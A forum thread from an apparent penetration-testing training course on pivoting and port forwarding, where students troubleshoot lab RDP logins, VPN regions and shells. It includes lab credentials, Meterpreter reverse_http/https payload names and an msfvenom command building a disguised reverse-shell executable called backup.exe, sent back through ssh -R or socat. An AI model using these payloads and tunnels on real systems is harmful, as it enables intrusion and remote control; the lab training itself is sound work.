Pivoting, tunneling, and port forwarding | Academy

Port Forwarding with Windows Netsh

I cant connect to RDP with cred victor:pass@123. Nor with netsh.exe redirect nor with classic UI RDP in windows pivot host. I can ping in pivot host.
Maybe someone done this module?

i had the same error.
Change the VPN to US Academy 1

1 Like

Oh, thank you a lot! That works with VPN US Academy 1. Before that I tryed from pwnbox.

The pwn box did not work for me either.

This also fails on the Remote/Reverse Port Forwarding with SSH section. Both EU and US VPNs fail…any hints on this?

Have truble with Skills Assessment. Host Periodically stops pinging. Unable to work. One minute it works, one minute it stops. Tried in pwnbox and VM. US1. I will try to change the region of the VPN.

I am having a similar issue with the SocksOverRDP module (changing the VPN or using Pwnbox did not help). Has anyone managed to make it work or found a workaround?

Yes, that worked for me. Just use US1 or US2 VPN.

That’s weird, I tried both US VPN but it did not help. I am still having an ERRCONNECT_LOGON_FAILURE error message.

May ask the HTB support team.

I already contacted support several days ago. They are aware of the issue. However, they haven’t got back since regarding a solution…

Changing VPN won’t fix that issue for me.

I’ve been on the “Port Forwarding with Windows Netsh” for 3 days. I can get to the windows logon screen. I can even nmap the service, but I just can’t login! Support hasn’t returned on this. Are this box so error prone or am I doing anything wrong?

So I continued in the module and the RDP-problem also occurs during the next 3 chapters.
Specifically, whenever an RDP connection needs be established from the first hop to the domain controller at Very frustrating!

I think that HTB support has since corrected it. In any case, the SocksOverRDP and Netsh labs seem to work properly now.

I’m having the issue as well. In the Port Forwarding with Windows: Netsh section the “victor” and “pass@123” credentials do not work to rdp to even when trying to RDP directly from the htb-student windows machine. The username and password box appears so it’s able to recognize RDP. I get the same ERRCONNECT_LOGON_FAILURE from the attack host. And when trying DC01.inlanefreight.local and other variants I sometimes get to the windows logon of the victim machine, but it says “We cannot sign you in with this credential because because your domain isn’t available.”

You might give it a try with local Kali Installation and VPN.

i don’t know what to be the problem,
Im at Remote/Reverse Port Forwarding with SSH

I solved my problem by changing this:

(reflective) windows/x64/meterpreter/reverse_https

to this:

(reflective) windows/x64/meterpreter/reverse_http

does anyone know what possible fixes so I can use https? thanks


You can now use https (inline) but not using reflective injection.

Use this instead:

(inline) windows/x64/meterpreter_reverse_https

I still dont know how I can use reflective https injection.
Tho http reflective, and https inline both work.

1 Like

on the Remote/Reverse Port Forwarding with SSH section…

I am trying to get the windows host to send a shell back to me. Not sure if I am doing something wrong or if its not working like people above stated.

  1. msfvenom -p windows/x64/meterpreter/reverse_http lhost= -f exe -o backup.exe LPORT=8080

Should the internal IP of pivot host be the 172.xxx.xxx.xxx address? or one of the other addresses?

  1. When using msfconsole for the reverse handler should I be using proxychains msfconsole?
    Started HTTPS reverse handler on

  2. Running ssh -R it seems like its working but It never kicks a connection back to msfconsole…
    debug1: channel 0: free:, nchannels 1

I never did get this to work with ssh -R on the Remote/Reverse Port Forwarding with SSH section.
I was able to get it to work with socat. I had to change the VPN to TCP from UDP and change the port using sudo msfconsole to listen on to 80 from 8000. If anyone can figure out the ssh -R part let me know please. Thanks!

I have another question… on the Meterpreter Tunneling & Port Forwarding section

I get this error,
The following options failed to validate: SESSION
on this part

this works

but same as the last module once everything is setup I can never get a shell back to my kali box…